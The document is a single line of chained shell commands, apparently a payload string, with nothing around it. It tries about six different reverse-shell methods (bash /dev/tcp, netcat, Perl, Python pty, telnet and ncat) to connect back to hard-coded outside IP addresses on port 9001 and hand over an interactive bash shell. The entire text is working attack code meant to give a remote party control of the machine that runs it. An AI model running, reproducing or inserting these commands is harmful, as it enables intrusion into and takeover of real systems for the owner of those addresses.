/bin/bash -i >& /dev/tcp/51.210.61.117/9001 0>&1;nc -e /bin/bash 51.210.61.117 9001;perl -e 'use Socket;$i="51.210.61.117";$p=9001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};';export RHOST="52.165.195.34";export RPORT=9001;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")';TF=$(mktemp -u);mkfifo $TF && telnet 51.210.61.117 9001 0<$TF | /bin/bash 1>$TF;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|ncat -u 51.210.61.117 9001 >/tmp/f